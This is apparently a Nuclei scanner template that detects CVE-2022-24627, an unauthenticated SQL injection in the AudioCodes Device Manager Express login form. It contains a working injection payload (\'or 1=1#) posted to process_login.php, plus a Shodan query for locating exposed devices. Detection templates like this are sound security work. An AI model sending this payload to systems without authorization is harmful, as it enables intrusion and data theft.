id: CVE-2022-24627 info: name: AudioCodes Device Manager Express - SQL Injection author: geeknik severity: critical description: | An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form. reference: - https://seclists.org/fulldisclosure/2023/Feb/12 - https://nvd.nist.gov/vuln/detail/CVE-2022-24627 - https://github.com/tr3ss/newclei classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24627 cwe-id: CWE-89 epss-score: 0.00109 epss-percentile: 0.43163 cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: audiocodes product: device_manager_express shodan-query: title:"Audiocodes" tags: cve,cve2022,seclists,sqli,audiocodes flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl dsl: - 'contains(tolower(body), "audiocodes")' internal: true - raw: - | POST /admin/AudioCodes_files/process_login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=admin&password=&domain=&p=%5C%27or+1%3D1%23 matchers: - type: word part: body words: - "SQL syntax" - "mysql_fetch" - "You have an error in your SQL syntax" condition: or # digest: 4b0a00483046022100961135146cb72e5ec123441fa9ff5dac7ec092b87f38888f1877ff1a5aa84f1c0221009e345921fc3a9094d5fd253bed1e6361bfae6d60ab6455dcfdafe7658a132668:922c64590222798bb761d5b6d8e72950